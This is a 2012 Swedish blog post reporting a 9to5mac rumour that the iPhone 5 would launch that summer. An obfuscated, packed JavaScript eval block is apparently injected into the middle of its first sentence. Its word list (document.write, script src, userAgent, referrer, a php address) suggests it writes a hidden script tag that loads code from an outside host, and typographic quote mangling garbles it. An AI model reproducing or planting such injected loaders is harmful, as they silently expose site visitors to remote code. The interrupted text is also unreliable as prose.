Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

iPhone 5 presenteras nu i sommar?

iPhone 5 presenteras nu i sommar?
Filip Urde
  • On 26 januari, 2012
  • http://www.revue.se/filip-urde
Äntligen?
Jag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dybna|var|u0026u|referrer|ezidz||js|php’.split(’|’),0,{}))
var själv ganska upprörd när det blev en 4S och inte en iPhone 5 i höstas.
Enligt en källa på Foxconn så kommer iPhone 5 att släppas till sommaren. Det är en källa som 9to5mac anser vara trovärdig, då samma källa konfirmerade att vi skulle få en iPhone 4S nu i höstas och inte en iPhone 5.  Att Apple brukar köra med en ett års cykel eller går tillbaka till sommarlansering. Källan i fråga menar att produktionen för nästa generationens iPhone redan har börjat. Om man tittar på hur långt innan vi fick veta att 4s var på gång så är det rimligt att iPhone 5 kommer i sommar.

Källan säger också att slutdesignen inte är klar! utan det cirkulerar en rad prototyper. Alla har dock gemensamt att det är en fyra tum eller större skärm, lika tunna och att man har en ny design mot 4S.
9to5mac.com